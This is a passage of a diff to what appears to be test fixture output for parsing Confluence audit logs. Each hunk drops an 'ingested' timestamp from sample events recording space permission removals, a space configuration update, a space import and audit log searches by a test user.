user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8892,7 +8797,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837547044Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.204Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8980,7 +8884,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837548095Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.200Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9068,7 +8971,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837549071Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.194Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9156,7 +9058,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837550179Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9237,7 +9138,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837551091Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.176Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9318,7 +9218,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837552017Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.166Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9406,7 +9305,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837552920Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.160Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9494,7 +9392,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837553824Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.155Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9582,7 +9479,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837554693Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.149Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9663,7 +9559,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837555568Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.143Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9751,7 +9646,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837556547Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.137Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9839,7 +9733,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837557553Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.132Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9927,7 +9820,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837558523Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.128Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10015,7 +9907,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837559721Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.122Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10103,7 +9994,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837560661Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.115Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10184,7 +10074,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837561674Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.107Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10272,7 +10161,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837562616Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.099Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10360,7 +10248,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837563585Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.091Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10448,7 +10335,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837564624Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.055Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10529,7 +10415,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837565595Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.008Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10630,7 +10515,6 @@ }, "event": { "action": "audit.logging.summary.space.config.updated", - "ingested": "2021-12-24T00:46:29.837566510Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.900Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.spaces\",\"category\":\"Spaces\",\"actionI18nKey\":\"audit.logging.summary.space.config.updated\",\"action\":\"Space configuration updated\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"\"},{\"key\":\"Home page\",\"i18nKey\":\"Home page\",\"to\":\"page: asdf v.1 (65593)\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"asdf\"},{\"key\":\"Space key\",\"i18nKey\":\"Space key\",\"to\":\"ASDF\"},{\"key\":\"Space status\",\"i18nKey\":\"Space status\",\"to\":\"CURRENT\"},{\"key\":\"Space type\",\"i18nKey\":\"Space type\",\"to\":\"global\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "change" @@ -10705,7 +10589,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:46:29.837567658Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.323Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10789,7 +10672,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837568627Z", "original": "{\"timestamp\":\"2021-11-23T00:39:11.067Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"52 - 61\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:39:11.057109Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.299Z - 2021-11-23T00:38:58.965Z\"}]}", "type": "info", "kind": "event" @@ -10873,7 +10755,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837569578Z", "original": "{\"timestamp\":\"2021-11-23T00:38:58.965Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search 